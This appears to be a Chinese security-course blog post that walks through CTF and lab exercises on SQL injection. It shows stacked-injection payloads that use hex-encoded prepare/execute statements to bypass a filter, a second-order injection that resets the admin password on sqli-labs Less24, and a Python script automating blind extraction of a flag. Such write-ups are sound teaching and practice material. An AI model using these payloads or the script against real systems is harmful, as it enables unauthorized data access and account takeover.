【小迪安全2023】第30天:WEB攻防-通用漏洞SQL注入CTF二次堆善DNS带外

本文主要是介绍【小迪安全2023】第30天:WEB攻防-通用漏洞SQL注入CTF二次堆善DNS带外,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

大纲:

一、堆叠注入

二、堆叠注入CTF题目

三、二次注入

sqli-labs/Less24

查看源代码,进行分析讲解:

四、二次注入CTF题目


大纲:

一、堆叠注入

  • 堆叠注入:根据数据库类型决定是否支持多条语句执行,用分号隔开。堆叠注入在代码中被执行是一方面,是否被执行成功又是另一方面。
  • 支持数据库类型:Mysql、Mssql等。

在mysql中,支持16进制编码。

参考文章:

https://www.cnblogs.com/backlion/p/9721687.html

最新堆叠查询注入攻击和注入代码分析技术-腾讯云开发者社区-腾讯云

二、堆叠注入CTF题目

进行常见的sql注入单引号测试,发现页面报错,存在sql注入

1'

然后就是今天学会的新姿势“堆叠注入”了。

原理很简单,就是通过号注入多条SQL语句。

先通过show databases爆出数据库。

1';show databases;

然后用 show tables 尝试爆表

1';show tables;

可以看到这里有两个表,我们先尝试爆words表的内容,

没有发现什么有关flag的信息。

1';show columns from words;

然后再尝试爆破“1919810931114514”表,

看到了flag字段

1';show columns from `1919810931114514`;

想查询到1919810931114514表中的flag字段详细信息,但是发现对select进行了过滤

1';select * from 1919810931114514

这里看大佬博客:

因为select被过滤了,所以先将select * from 1919810931114514 进行16进制编码

再通过构造payload得:

1’;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;//prepare…from…是预处理语句,会进行编码转换。
//execute用来执行由SQLPrepare创建的SQL语句。
//SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。

博客参考链接:

https://www.cnblogs.com/takagisan/p/16265960.html

三、二次注入

二次注入就是先插入攻击语句,插入的过程中就会被执行,然后某些页面会展示执行后的内容。

举个例子:

假如在注册用户的时候,需要填用户名、邮箱和密码,登录使用邮箱和密码,登陆上去后会显示用户名,后台为什么知道你的用户名,就可能是使用SQL语句,通过你的邮箱和密码查询到用户名。假如用户名是SQL语句,会在插入的时候就执行SQL语句,然后显示。这就是二次注入的基本原理。

sqli-labs/Less24

这里呢,给大家伙拿靶场sqli-labs/Less24复现一下二次注入,虽然小迪没讲,但是我觉得这个靶场复现sql二次注入还是蛮清晰的,希望可以让师傅们对二次注入更加了解。

sqli-labs/Less24靶场里面,默认数据库里面有admin用户,且密码是admin,我们这里就来利用这个靶场来复现下。

然后我们注册一个admin'#的用户,密码也是admin'#。

然后再登录admin'#这个用户,然后我们在下面进行修改admin'#用户的密码为123456

然后我就可以利用admin'#的密码123456就可以登录admin账户了,数据库中admin用户的密码也变成了123456。

至此,sql二次注入就成功执行了。

查看源代码,进行分析讲解:

登录新建用户admin'#后我们进行更改密码为123456

服务器执行的代码是:

UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'

这个时候就出现问题了 admin'#进入数据库的时候单引号和#号被当成了字符 但是从$username提取出来的admin'# 单引号和#号又被当成了特殊字符

于是语句就变成了:

UPDATE users SET PASSWORD='123456' where username='admin'#' and password='$curr_pass'

标记红的是被注释掉了 这样就造成了无admin密码的情况下 就可以修改admin密码

四、二次注入CTF题目

这个题目是个sql二次注入的题目,扫描目录,发现存在注册页面:register.php

这个二次注入,我是参考红队大佬的python代码:

import requests
import time
from bs4 import BeautifulSoupdef get_flag():flag = ''url = 'http://4ecc41d2-2490-46b9-a16a-f384574ca1ca.node4.buuoj.cn:81/'register_url = url + 'register.php'login_url = url + 'login.php'for i in range(1, 100):time.sleep(0.5)register_data = {"email": "{}@1.com".format(i),"username": "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i), "password": "1"}login_data = {"email": "{}@1.com".format(i), "password": "1"}requests.post(register_url, data=register_data)response_login = requests.post(login_url, data=login_data)bs = BeautifulSoup(response_login.text, 'html.parser') username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性number = username.text  flag += chr(int(number))print("\r", end="")print(flag,end="")if __name__ == '__main__':get_flag()

这篇关于【小迪安全2023】第30天:WEB攻防-通用漏洞SQL注入CTF二次堆善DNS带外的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/912227

相关文章

MySQL双主搭建+keepalived高可用的实现

《MySQL双主搭建+keepalived高可用的实现》本文主要介绍了MySQL双主搭建+keepalived高可用的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,... 目录一、测试环境准备二、主从搭建1.创建复制用户2.创建复制关系3.开启复制,确认复制是否成功4.同

MyBatis 动态 SQL 优化之标签的实战与技巧(常见用法)

《MyBatis动态SQL优化之标签的实战与技巧(常见用法)》本文通过详细的示例和实际应用场景,介绍了如何有效利用这些标签来优化MyBatis配置,提升开发效率,确保SQL的高效执行和安全性,感... 目录动态SQL详解一、动态SQL的核心概念1.1 什么是动态SQL?1.2 动态SQL的优点1.3 动态S

Mysql表的简单操作(基本技能)

《Mysql表的简单操作(基本技能)》在数据库中,表的操作主要包括表的创建、查看、修改、删除等,了解如何操作这些表是数据库管理和开发的基本技能,本文给大家介绍Mysql表的简单操作,感兴趣的朋友一起看... 目录3.1 创建表 3.2 查看表结构3.3 修改表3.4 实践案例:修改表在数据库中,表的操作主要

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

一文教你如何将maven项目转成web项目

《一文教你如何将maven项目转成web项目》在软件开发过程中,有时我们需要将一个普通的Maven项目转换为Web项目,以便能够部署到Web容器中运行,本文将详细介绍如何通过简单的步骤完成这一转换过程... 目录准备工作步骤一:修改​​pom.XML​​1.1 添加​​packaging​​标签1.2 添加

mysql出现ERROR 2003 (HY000): Can‘t connect to MySQL server on ‘localhost‘ (10061)的解决方法

《mysql出现ERROR2003(HY000):Can‘tconnecttoMySQLserveron‘localhost‘(10061)的解决方法》本文主要介绍了mysql出现... 目录前言:第一步:第二步:第三步:总结:前言:当你想通过命令窗口想打开mysql时候发现提http://www.cpp

MySQL大表数据的分区与分库分表的实现

《MySQL大表数据的分区与分库分表的实现》数据库的分区和分库分表是两种常用的技术方案,本文主要介绍了MySQL大表数据的分区与分库分表的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录1. mysql大表数据的分区1.1 什么是分区?1.2 分区的类型1.3 分区的优点1.4 分

MySQL错误代码2058和2059的解决办法

《MySQL错误代码2058和2059的解决办法》:本文主要介绍MySQL错误代码2058和2059的解决办法,2058和2059的错误码核心都是你用的客户端工具和mysql版本的密码插件不匹配,... 目录1. 前置理解2.报错现象3.解决办法(敲重点!!!)1. php前置理解2058和2059的错误

Mysql删除几亿条数据表中的部分数据的方法实现

《Mysql删除几亿条数据表中的部分数据的方法实现》在MySQL中删除一个大表中的数据时,需要特别注意操作的性能和对系统的影响,本文主要介绍了Mysql删除几亿条数据表中的部分数据的方法实现,具有一定... 目录1、需求2、方案1. 使用 DELETE 语句分批删除2. 使用 INPLACE ALTER T

MySQL INSERT语句实现当记录不存在时插入的几种方法

《MySQLINSERT语句实现当记录不存在时插入的几种方法》MySQL的INSERT语句是用于向数据库表中插入新记录的关键命令,下面:本文主要介绍MySQLINSERT语句实现当记录不存在时... 目录使用 INSERT IGNORE使用 ON DUPLICATE KEY UPDATE使用 REPLACE